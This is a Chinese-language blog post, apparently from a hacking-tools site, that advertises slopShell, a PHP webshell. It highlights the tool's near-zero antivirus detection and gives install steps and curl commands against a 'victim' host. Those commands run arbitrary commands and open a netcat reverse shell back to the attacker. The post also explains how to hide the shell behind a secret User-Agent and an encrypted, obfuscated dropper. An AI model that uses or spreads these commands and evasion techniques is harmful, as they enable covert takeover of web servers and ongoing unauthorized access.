slopShell:你唯一需要的PHP Webshell
作者:admin | 时间:2021-6-19 00:43:44 | 分类:黑客工具 隐藏侧边栏展开侧边栏
关于slopShell
slopShell是一款功能强大的PHP Webshell,有了它,你就不需要再用到其他Webshell了。
为了让这个shell正常工作,广大研究人员只需要做两件事情,一是能够将php文件发送给目标用户,二是能够向这个Webshell发送HTTP请求
工具演示视频
视频地址:【点我观看】
当前VirusTotal检测率:2/59
当前VirusTotal检测率(混淆版本):0/59
工具安装
首先,广大研究人员需要运行一台由自己控制的pgsql服务器,然后根据自己的操作系统类型选择对应的安装命令:
Debian
apt install -y postgresql php php-pear && python -m pip install proxybroker --user
RHEL系统
dnf -y -b install postgresql-server postgresql php php-pear && python -m pip install proxybroker --user
一旦这些设置正确并且可以确认它们正在运行,我建议广大研究人员运行命令“pg_ctl”来创建数据库,并实现数据库的初始化和启动,以此确保所有数据库查询都可以正常工作。
工具交互
首先,您需要选择一个有效的User-Agent来使用,你可以把它看成是第一层保护,以防您的webshell被除您之外的任何人意外地发现。我这里选择的是“sp/1.1”,因为它是一个非典型的User-Agent。如果设置不当的话,可能会导致渗透测试过程中出现问题,或者导致脚本和访问请求被屏蔽。对于Windows版本的话,我没有添加过多内容,因为本人不太喜欢Windows开发。
下面给出的是如何将此webshell与curl一起使用的示例:
curl https://victim/slop.php?qs=cqP -H "User-Agent: sp/1.1" -v
或者,执行下列自定义命令:
curl https://victim/slop.php --data "commander=id" -H "User-Agent: sp/1.1" -v
或者,可以尝试跟你自己的设备建立一个反向Shell:
curl https://victim/slop.php --data "rcom=1&mthd=nc&rhost=&rport=&shell=sh" -H "User-Agent: sp/1.1" -v
工具使用样例
在浏览器中,在不使用正常User-Agent字符串的情况下发送请求(第一层认证):
在命令行终端窗口中,使用curl命令以及-vH "User-Agent: sp1.1"选项执行:
经过混淆处理后的脚本示例:
生成混淆后的脚本:
数据加密
当加密程序运行完之后,Dropper脚本将会被加密,并且经过高度混淆处理,样本输出如下:
Base64 decoded: also a test 123 Re-Encoded: YWxzbyBhIHRlc3QgMTIz Key: 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e Key Length: 96 Encryption Result: Array ( [original] => also a test 123 [key] => 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e [encrypted] => meIHs/y6_U7U~7(M [base64_Encoded] => bWVJSAAdcw4veTZfVQU3VX43KE0= ) Decrypt Test: Array ( [key] => 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e [encrypted] => meIHs/y6_U7U~7(M [decrypted] => YWxzbyBhIHRlc3QgMTIz [base64_decoded] => also a test 123 [original] => also a test 123 )
项目地址
slopShell:【GitHub传送门】